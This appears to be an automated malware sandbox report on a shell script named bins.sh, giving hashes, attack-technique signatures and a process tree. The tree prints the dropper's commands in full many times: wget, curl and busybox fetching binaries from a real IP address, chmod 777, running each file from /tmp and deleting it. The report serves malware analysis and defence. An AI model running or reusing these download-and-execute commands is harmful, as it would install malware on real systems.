Analysis
-
max time kernel
118s -
max time network
174s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipsel image:debian9-mipsel-20240611-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mipsel system -
submitted
04-11-2024 04:02
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
3974491d00b9582e0258135c610a9421
-
SHA1
ecc37a0827534c2c0481e0612cd6df3fc19cf86e
-
SHA256
6bfa6f703269861e72d2adaf8105b6e76da66084c6242ca779b0a88fba559328
-
SHA512
7ede6a7178e143e32559bf9d3d51f2a6ab740c5e865bac2d7a173aef231ba0856edd270e2d8cada9440d33606071b1b89fda997c11b31fe7121618274641b57a
-
SSDEEP
192:hZC8+oCsQQl95VnaK4St9bi6I7HDvb5k8h74i6I7H/0vb5k8EC8+oCsQQHZ5VnaZ:hZhVrQQlSSnCvb5k8h790vb5k8EhVrQZ
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
Process: chmod
PIDs: 740, 980, 962, 968, 878, 926, 866, 938, 746, 754, 884, 914, 920, 932, 950, 818, 890, 860, 908, 944, 956, 974, 780, 834, 902, 811, 896, 872
-
Executes dropped EXE 28 IoCs
Processes:
-
Processes:
File opened for reading: /proc/sys/crypto/fips_enabled (by each curl process)
-
System Network Configuration Discovery 1 TTPs 10 IoCs
Adversaries may gather information about the network configuration of a system.
Processes:
pid Process
929 wget
933 13LziPPOU64KElhsy06VSGNerH5jNdigll
887 wget
889 busybox
892 rm
930 curl
931 busybox
934 rm
888 curl
891 13LziPPOU64KElhsy06VSGNerH5jNdigll
-
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes:
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵PID:708
-
/bin/rm/bin/rm bins.sh2⤵PID:711
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE2⤵PID:715
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:730
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE2⤵PID:738
-
-
/bin/chmodchmod 777 Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE2⤵
- File and Directory Permissions Modification
PID:740
-
-
/tmp/Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE./Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE2⤵
- Executes dropped EXE
PID:741
-
-
/bin/rmrm Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE2⤵PID:742
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd2⤵PID:743
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:744
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd2⤵PID:745
-
-
/bin/chmodchmod 777 EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd2⤵
- File and Directory Permissions Modification
PID:746
-
-
/tmp/EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd./EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd2⤵
- Executes dropped EXE
PID:747
-
-
/bin/rmrm EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd2⤵PID:748
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi2⤵PID:749
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:750
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi2⤵PID:751
-
-
/bin/chmodchmod 777 NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi2⤵
- File and Directory Permissions Modification
PID:754
-
-
/tmp/NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi./NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi2⤵
- Executes dropped EXE
PID:755
-
-
/bin/rmrm NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi2⤵PID:757
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA2⤵PID:758
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:766
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA2⤵PID:775
-
-
/bin/chmodchmod 777 v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA2⤵
- File and Directory Permissions Modification
PID:780
-
-
/tmp/v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA./v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA2⤵
- Executes dropped EXE
PID:782
-
-
/bin/rmrm v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA2⤵PID:785
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB2⤵PID:786
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:794
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB2⤵PID:809
-
-
/bin/chmodchmod 777 0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB2⤵
- File and Directory Permissions Modification
PID:811
-
-
/tmp/0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB./0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB2⤵
- Executes dropped EXE
PID:813
-
-
/bin/rmrm 0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB2⤵PID:814
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU2⤵PID:815
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:816
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU2⤵PID:817
-
-
/bin/chmodchmod 777 MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU2⤵
- File and Directory Permissions Modification
PID:818
-
-
/tmp/MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU./MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU2⤵
- Executes dropped EXE
PID:819
-
-
/bin/rmrm MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU2⤵PID:820
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY12⤵PID:821
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY12⤵
- Reads runtime system information
- Writes file to tmp directory
PID:822
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY12⤵PID:830
-
-
/bin/chmodchmod 777 QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY12⤵
- File and Directory Permissions Modification
PID:834
-
-
/tmp/QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY1./QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY12⤵
- Executes dropped EXE
PID:835
-
-
/bin/rmrm QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY12⤵PID:838
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz2⤵PID:840
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:848
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz2⤵PID:859
-
-
/bin/chmodchmod 777 xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz2⤵
- File and Directory Permissions Modification
PID:860
-
-
/tmp/xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz./xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz2⤵
- Executes dropped EXE
PID:861
-
-
/bin/rmrm xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz2⤵PID:862
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni52⤵PID:863
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:864
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni52⤵PID:865
-
-
/bin/chmodchmod 777 4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni52⤵
- File and Directory Permissions Modification
PID:866
-
-
/tmp/4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni5./4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni52⤵
- Executes dropped EXE
PID:867
-
-
/bin/rmrm 4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni52⤵PID:868
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R2⤵PID:869
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:870
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R2⤵PID:871
-
-
/bin/chmodchmod 777 xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R2⤵
- File and Directory Permissions Modification
PID:872
-
-
/tmp/xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R./xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R2⤵
- Executes dropped EXE
PID:873
-
-
/bin/rmrm xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R2⤵PID:874
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj2⤵PID:875
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:876
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj2⤵PID:877
-
-
/bin/chmodchmod 777 YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj2⤵
- File and Directory Permissions Modification
PID:878
-
-
/tmp/YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj./YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj2⤵
- Executes dropped EXE
PID:879
-
-
/bin/rmrm YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj2⤵PID:880
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC202⤵PID:881
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC202⤵
- Reads runtime system information
- Writes file to tmp directory
PID:882
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC202⤵PID:883
-
-
/bin/chmodchmod 777 1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC202⤵
- File and Directory Permissions Modification
PID:884
-
-
/tmp/1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC20./1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC202⤵
- Executes dropped EXE
PID:885
-
-
/bin/rmrm 1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC202⤵PID:886
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/13LziPPOU64KElhsy06VSGNerH5jNdigll2⤵
- System Network Configuration Discovery
PID:887
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/13LziPPOU64KElhsy06VSGNerH5jNdigll2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:888
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/13LziPPOU64KElhsy06VSGNerH5jNdigll2⤵
- System Network Configuration Discovery
PID:889
-
-
/bin/chmodchmod 777 13LziPPOU64KElhsy06VSGNerH5jNdigll2⤵
- File and Directory Permissions Modification
PID:890
-
-
/tmp/13LziPPOU64KElhsy06VSGNerH5jNdigll./13LziPPOU64KElhsy06VSGNerH5jNdigll2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:891
-
-
/bin/rmrm 13LziPPOU64KElhsy06VSGNerH5jNdigll2⤵
- System Network Configuration Discovery
PID:892
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/b9hjKgLiksrxr40vGLawuxTS92IUqQec3R2⤵PID:893
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/b9hjKgLiksrxr40vGLawuxTS92IUqQec3R2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:894
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/b9hjKgLiksrxr40vGLawuxTS92IUqQec3R2⤵PID:895
-
-
/bin/chmodchmod 777 b9hjKgLiksrxr40vGLawuxTS92IUqQec3R2⤵
- File and Directory Permissions Modification
PID:896
-
-
/tmp/b9hjKgLiksrxr40vGLawuxTS92IUqQec3R./b9hjKgLiksrxr40vGLawuxTS92IUqQec3R2⤵
- Executes dropped EXE
PID:897
-
-
/bin/rmrm b9hjKgLiksrxr40vGLawuxTS92IUqQec3R2⤵PID:898
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj2⤵PID:899
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:900
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj2⤵PID:901
-
-
/bin/chmodchmod 777 YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj2⤵
- File and Directory Permissions Modification
PID:902
-
-
/tmp/YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj./YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj2⤵
- Executes dropped EXE
PID:903
-
-
/bin/rmrm YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj2⤵PID:904
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni52⤵PID:905
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:906
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni52⤵PID:907
-
-
/bin/chmodchmod 777 4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni52⤵
- File and Directory Permissions Modification
PID:908
-
-
/tmp/4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni5./4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni52⤵
- Executes dropped EXE
PID:909
-
-
/bin/rmrm 4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni52⤵PID:910
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R2⤵PID:911
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:912
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R2⤵PID:913
-
-
/bin/chmodchmod 777 xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R2⤵
- File and Directory Permissions Modification
PID:914
-
-
/tmp/xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R./xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R2⤵
- Executes dropped EXE
PID:915
-
-
/bin/rmrm xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R2⤵PID:916
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/b9hjKgLiksrxr40vGLawuxTS92IUqQec3R2⤵PID:917
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/b9hjKgLiksrxr40vGLawuxTS92IUqQec3R2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:918
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/b9hjKgLiksrxr40vGLawuxTS92IUqQec3R2⤵PID:919
-
-
/bin/chmodchmod 777 b9hjKgLiksrxr40vGLawuxTS92IUqQec3R2⤵
- File and Directory Permissions Modification
PID:920
-
-
/tmp/b9hjKgLiksrxr40vGLawuxTS92IUqQec3R./b9hjKgLiksrxr40vGLawuxTS92IUqQec3R2⤵
- Executes dropped EXE
PID:921
-
-
/bin/rmrm b9hjKgLiksrxr40vGLawuxTS92IUqQec3R2⤵PID:922
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC202⤵PID:923
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC202⤵
- Reads runtime system information
- Writes file to tmp directory
PID:924
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC202⤵PID:925
-
-
/bin/chmodchmod 777 1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC202⤵
- File and Directory Permissions Modification
PID:926
-
-
/tmp/1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC20./1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC202⤵
- Executes dropped EXE
PID:927
-
-
/bin/rmrm 1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC202⤵PID:928
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/13LziPPOU64KElhsy06VSGNerH5jNdigll2⤵
- System Network Configuration Discovery
PID:929
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/13LziPPOU64KElhsy06VSGNerH5jNdigll2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:930
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/13LziPPOU64KElhsy06VSGNerH5jNdigll2⤵
- System Network Configuration Discovery
PID:931
-
-
/bin/chmodchmod 777 13LziPPOU64KElhsy06VSGNerH5jNdigll2⤵
- File and Directory Permissions Modification
PID:932
-
-
/tmp/13LziPPOU64KElhsy06VSGNerH5jNdigll./13LziPPOU64KElhsy06VSGNerH5jNdigll2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:933
-
-
/bin/rmrm 13LziPPOU64KElhsy06VSGNerH5jNdigll2⤵
- System Network Configuration Discovery
PID:934
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB2⤵PID:935
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:936
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB2⤵PID:937
-
-
/bin/chmodchmod 777 0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB2⤵
- File and Directory Permissions Modification
PID:938
-
-
/tmp/0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB./0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB2⤵
- Executes dropped EXE
PID:939
-
-
/bin/rmrm 0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB2⤵PID:940
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE2⤵PID:941
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:942
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE2⤵PID:943
-
-
/bin/chmodchmod 777 Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE2⤵
- File and Directory Permissions Modification
PID:944
-
-
/tmp/Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE./Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE2⤵
- Executes dropped EXE
PID:945
-
-
/bin/rmrm Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE2⤵PID:946
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd2⤵PID:947
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:948
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd2⤵PID:949
-
-
/bin/chmodchmod 777 EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd2⤵
- File and Directory Permissions Modification
PID:950
-
-
/tmp/EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd./EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd2⤵
- Executes dropped EXE
PID:951
-
-
/bin/rmrm EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd2⤵PID:952
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi2⤵PID:953
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:954
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi2⤵PID:955
-
-
/bin/chmodchmod 777 NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi2⤵
- File and Directory Permissions Modification
PID:956
-
-
/tmp/NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi./NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi2⤵
- Executes dropped EXE
PID:957
-
-
/bin/rmrm NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi2⤵PID:958
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA2⤵PID:959
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:960
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA2⤵PID:961
-
-
/bin/chmodchmod 777 v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA2⤵
- File and Directory Permissions Modification
PID:962
-
-
/tmp/v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA./v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA2⤵
- Executes dropped EXE
PID:963
-
-
/bin/rmrm v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA2⤵PID:964
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz2⤵PID:965
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:966
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz2⤵PID:967
-
-
/bin/chmodchmod 777 xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz2⤵
- File and Directory Permissions Modification
PID:968
-
-
/tmp/xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz./xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz2⤵
- Executes dropped EXE
PID:969
-
-
/bin/rmrm xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz2⤵PID:970
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU2⤵PID:971
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:972
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU2⤵PID:973
-
-
/bin/chmodchmod 777 MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU2⤵
- File and Directory Permissions Modification
PID:974
-
-
/tmp/MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU./MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU2⤵
- Executes dropped EXE
PID:975
-
-
/bin/rmrm MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU2⤵PID:976
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY12⤵PID:977
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY12⤵
- Reads runtime system information
- Writes file to tmp directory
PID:978
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY12⤵PID:979
-
-
/bin/chmodchmod 777 QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY12⤵
- File and Directory Permissions Modification
PID:980
-
-
/tmp/QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY1./QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY12⤵
- Executes dropped EXE
PID:981
-
-
/bin/rmrm QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY12⤵PID:982
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5
998368d7c95ea4293237f2320546e440
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97